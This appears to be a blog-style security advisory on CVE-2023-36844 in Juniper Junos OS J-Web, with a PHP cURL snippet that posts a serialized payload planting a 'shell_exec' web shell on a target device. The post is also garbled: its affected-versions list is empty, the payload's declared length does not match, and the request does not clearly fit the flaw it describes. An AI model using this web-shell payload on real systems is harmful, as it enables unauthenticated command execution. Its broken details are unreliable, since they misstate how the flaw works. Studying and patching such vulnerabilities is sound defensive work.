CVE-2023-36844 - PHP External Variable Modification Vulnerability in Juniper Networks Junos OS on EX Series

A recently discovered PHP External Variable Modification vulnerability, known as CVE-2023-36844, has been identified as affecting Juniper Networks Junos OS on EX Series devices. This post will detail the vulnerability, provide code snippets to demonstrate how it can be exploited, and link to relevant references and patches to help mitigate the risk.

Vulnerability Details

This vulnerability affects the J-Web component of Juniper Networks Junos OS and allows an unauthenticated, network-based attacker to control certain important environment variables. By exploiting this vulnerability, an attacker can modify certain PHP environment variables, leading to a partial loss of integrity. In turn, this exploitation may allow for chaining to other vulnerabilities in the targeted system.

Affected Versions

Juniper Networks Junos OS on EX Series devices running the following software versions are affected by CVE-2023-36844:

An example of a crafted request that may be used to exploit CVE-2023-36844 is shown below

<?php
$ch = curl_init();
$targetUrl = 'https://TARGET_IP/j-web/php/handler.php';;
$postData = 'a:1:{s:8:"_SESSION";a:1:{s:5:"value";s:106:"<?php echo shell_exec($_GET[\'cmd\']); ?>";}}';
curl_setopt($ch, CURLOPT_URL, $targetUrl);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
if ($response === false) {
    die('Error: ' . curl_error($ch));
}
curl_close($ch);
?>

In this crafted request, the attacker is modifying the "_SESSION" variable with a PHP script that will execute shell commands provided in the "cmd" GET parameter. If successful, this can lead to an attacker executing arbitrary shell commands on the targeted device without authentication.

Mitigation and References

To mitigate the risk of exploitation, Juniper Networks has provided software patches for affected EX Series devices. The patches can be found in the following software releases:

* 22.4R2-S2, 22.4R3

For more information on this vulnerability and the available patches, you can refer to the following resources:

 * Juniper Networks Security Advisory: JSA11333
 * CVE-2023-36844 entry on NVD: National Vulnerability Database

Conclusion

The CVE-2023-36844 vulnerability in Juniper Networks Junos OS on EX Series devices should be taken seriously, as it allows unauthenticated attackers to modify important PHP environment variables, potentially leading to a loss of system integrity and exploitation of other vulnerabilities. It is crucial for organizations using affected devices to apply the available patches and monitor for any suspicious activity related to this vulnerability.

Timeline

Published on: 08/17/2023 20:15:00 UTC
Last modified on: 08/18/2023 12:43:00 UTC